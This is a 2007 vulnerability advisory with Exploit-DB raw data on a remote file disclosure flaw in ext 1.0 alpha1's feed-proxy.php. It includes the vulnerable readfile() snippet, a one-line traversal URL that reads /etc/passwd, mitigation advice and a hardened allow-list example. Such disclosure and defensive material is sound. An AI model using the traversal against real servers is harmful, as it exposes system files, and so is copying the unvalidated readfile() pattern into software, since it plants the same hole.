Vendor: ext 1.0 alpha1
By: Alkomandoz Hacker
CVSS: 5.5 (MEDIUM)
Type: Remote File Disclosure
CWE: 22
Product Name: ext 1.0 alpha1
Affected Version From: ext 1.0 alpha1
Affected Version To: ext 1.0 alpha1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure

This vulnerability allows an attacker to disclose files remotely through the feed-proxy.php script shipped with ext 1.0 alpha1. The script passes the value of the 'feed' URL parameter to readfile() without validating it, so a crafted value makes the server return the contents of local files such as /etc/passwd in its response.

Mitigation:

To mitigate this vulnerability, the vendor should release a patch that properly validates user input and prevents directory traversal attacks. In the meantime, users are advised to restrict access to the affected script or remove it entirely if not needed.
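As an added example (not code from ext or from the advisory), the following is a hardened form of feed-proxy.php: the 'feed' parameter is compared against a fixed allow-list before readfile() ever sees it. The allow-listed URLs are hypothetical placeholders.

```php
<?php
// Added example, not ext's own code: a hardened feed-proxy.php. The 'feed'
// parameter is checked against a fixed allow-list before readfile() sees it,
// so it can no longer name a local path such as /etc/passwd or an arbitrary host.
declare(strict_types=1);

// Hypothetical allow-list; list only the feeds the layout example really uses.
const ALLOWED_FEEDS = [
    'http://feeds.example.com/news.xml',
    'http://feeds.example.com/blog.xml',
];

/**
 * Returns $feed unchanged if it is exactly one of the allowed URLs, else null.
 * Exact string matching means traversal strings ("http../../../etc/passwd"),
 * file:// and php:// wrappers, and unknown hosts are all rejected without
 * maintaining any denylist of bad patterns.
 */
function resolve_feed($feed): ?string
{
    // $_GET['feed'] may also be an array (feed[]=...), so check the type first.
    if (!is_string($feed) || $feed === '') {
        return null;
    }
    return in_array($feed, ALLOWED_FEEDS, true) ? $feed : null;
}

$feed = resolve_feed($_GET['feed'] ?? null);
if ($feed === null) {
    http_response_code(400);
    header('Content-Type: text/plain');
    echo "Unknown feed\n";
    return;
}

header('Content-Type: text/xml');
readfile($feed); // only ever receives a URL taken from ALLOWED_FEEDS
```

An equivalent design is to accept a short key such as feed=news and look the URL up in a map, which keeps the URLs out of the query string entirely.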

Exploit-DB raw data:

#  ext 1.0 alpha1 (feed-proxy.php) Remote File Disclosure
# D.Script: http://yui-ext.com/deploy/ext-1.0-alpha1.zip
# Discovered by: Alkomandoz Hacker
# Homepage: http://www.asb-may.net - mohandko.com - sniper-sa.com - tryag.com
# V.Code In /examples/layout/feed-proxy.php

----------------------------------------------------------

        header('Content-Type: text/xml');
        readfile($feed);   // $feed is taken straight from the request's 'feed' parameter
        return;
}
?>

----------------------------------------------------------

# Exploit:[Path_ext]/examples/layout/feed-proxy.php?feed=http../../../../../../etc/passwd

# Greetz To: AsbMay's Group & City Of Ghost Team

# milw0rm.com [2007-04-25]